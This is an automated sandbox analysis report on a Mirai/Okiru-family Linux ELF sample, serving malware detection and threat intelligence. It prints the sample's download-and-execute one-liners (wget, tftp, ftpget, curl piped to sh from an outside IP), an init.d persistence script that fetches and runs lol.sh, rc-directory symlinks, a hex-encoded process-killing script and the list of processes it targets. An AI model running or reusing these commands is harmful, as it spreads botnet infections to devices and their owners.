Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:m68k.nn.elf
Analysis ID:1566179
MD5:21660026bffec7a97c1db4267f2e25b7
SHA1:4d4e4360287bdb490fb17a987c73e222bdf7ad82
SHA256:9453ed8ea2b513e3dac9ff38f93e4a978a674234a28db0a70b8527c6773aff91
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1566179
Start date and time:2024-12-01 15:23:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:m68k.nn.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/11@0/0
  • VT rate limit hit for: m68k.nn.elf
Command:/tmp/m68k.nn.elf
PID:6238
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • m68k.nn.elf (PID: 6238, Parent: 6164, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf
    • sh (PID: 6277, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6283, Parent: 6277)
      • systemctl (PID: 6283, Parent: 6277, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6317, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6319, Parent: 6317)
      • chmod (PID: 6319, Parent: 6317, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6321, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6327, Parent: 6321)
      • ln (PID: 6327, Parent: 6321, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6328, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
    • sh (PID: 6330, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6335, Parent: 6330)
      • chmod (PID: 6335, Parent: 6330, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/m68k.nn.elf
    • sh (PID: 6336, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6338, Parent: 6336)
      • mkdir (PID: 6338, Parent: 6336, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6352, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6358, Parent: 6352)
      • ln (PID: 6358, Parent: 6352, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
  • udisksd New Fork (PID: 6249, Parent: 799)
  • dumpe2fs (PID: 6249, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6285, Parent: 799)
  • dumpe2fs (PID: 6285, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6287, Parent: 6286)
  • snapd-env-generator (PID: 6287, Parent: 6286, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6295, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6295, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • gdm3 New Fork (PID: 6339, Parent: 1320)
  • Default (PID: 6339, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6340, Parent: 1320)
  • Default (PID: 6340, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • udisksd New Fork (PID: 6368, Parent: 799)
  • dumpe2fs (PID: 6368, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6396, Parent: 799)
  • dumpe2fs (PID: 6396, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
m68k.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    m68k.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6260.1.00007f29fc001000.00007f29fc01c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6260.1.00007f29fc001000.00007f29fc01c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6238.1.00007f29fc001000.00007f29fc01c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            6238.1.00007f29fc001000.00007f29fc01c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Process Memory Space: m68k.nn.elf PID: 6238JoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: m68k.nn.elfReversingLabs: Detection: 34%
                Source: m68k.nn.elfString: getinfo xxx(deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/login94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
                Source: m68k.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: global trafficTCP traffic: 192.168.2.23:38968 -> 154.216.19.139:199
                Source: /tmp/m68k.nn.elf (PID: 6238)Socket: 0.0.0.0:38242Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.38.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: getinfo xxx(deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
                Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 1664, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 6295, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6260)SIGKILL sent: pid: 6307, result: successfulJump to behavior
                Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/11@0/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/m68k.nn.elf (PID: 6238)File: /etc/profileJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6238)File: /etc/rc.localJump to behavior
                Source: /usr/bin/ln (PID: 6327)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
                Source: /usr/bin/ln (PID: 6358)File: /etc/rc.d/S99m68k.nn.elf -> /etc/init.d/m68k.nn.elfJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6238)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6319)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6335)File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6277)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6317)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6321)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6328)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6330)Shell command executed: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6336)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6352)Shell command executed: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"Jump to behavior
                Source: /bin/sh (PID: 6319)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
                Source: /bin/sh (PID: 6335)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/m68k.nn.elfJump to behavior
                Source: /bin/sh (PID: 6338)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
                Source: /bin/sh (PID: 6283)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6238)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6319)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6335)File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6238)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
                Source: /tmp/m68k.nn.elf (PID: 6238)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
                Source: /bin/sh (PID: 6328)Writes shell script file to disk with an unusual file extension: /etc/init.d/m68k.nn.elfJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: /tmp/m68k.nn.elf (PID: 6238)File: /etc/init.d/systemJump to dropped file
                Source: /bin/sh (PID: 6328)File: /etc/init.d/m68k.nn.elfJump to dropped file
                Source: /tmp/m68k.nn.elf (PID: 6238)Queries kernel information via 'uname': Jump to behavior
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.MII8vT--5@
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmp, m68k.nn.elf, 6260.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
                Source: m68k.nn.elf, 6260.1.00007f29fc01e000.00007f29fc023000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: /tmp/qemu-open.MII8vT
                Source: m68k.nn.elf, 6260.1.0000561a43c75000.0000561a43cfa000.rw-.sdmpBinary or memory string: V!/usr/bin/vmtoolsd
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmp, m68k.nn.elf, 6260.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmp, m68k.nn.elf, 6260.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: vx86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
                Source: m68k.nn.elf, 6238.1.0000561a43c75000.0000561a43cfa000.rw-.sdmp, m68k.nn.elf, 6260.1.0000561a43c75000.0000561a43cfa000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
                Source: m68k.nn.elf, 6238.1.0000561a43c75000.0000561a43cfa000.rw-.sdmp, m68k.nn.elf, 6260.1.0000561a43c75000.0000561a43cfa000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/m68k
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                Source: m68k.nn.elf, 6238.1.00007ffc69473000.00007ffc69494000.rw-.sdmp, m68k.nn.elf, 6260.1.00007ffc69473000.00007ffc69494000.rw-.sdmpBinary or memory string: panel/wrapper-2./qemu-open.XXXXX

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6260.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6238.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6260.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6238.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6238, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6260, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6260.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6238.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6260.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6238.1.00007f29fc001000.00007f29fc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6238, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6260, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Unix Shell Configuration Modification
                1
                Unix Shell Configuration Modification
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Data Manipulation
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Systemd Service
                1
                Systemd Service
                2
                File and Directory Permissions Modification
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Scripting
                Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
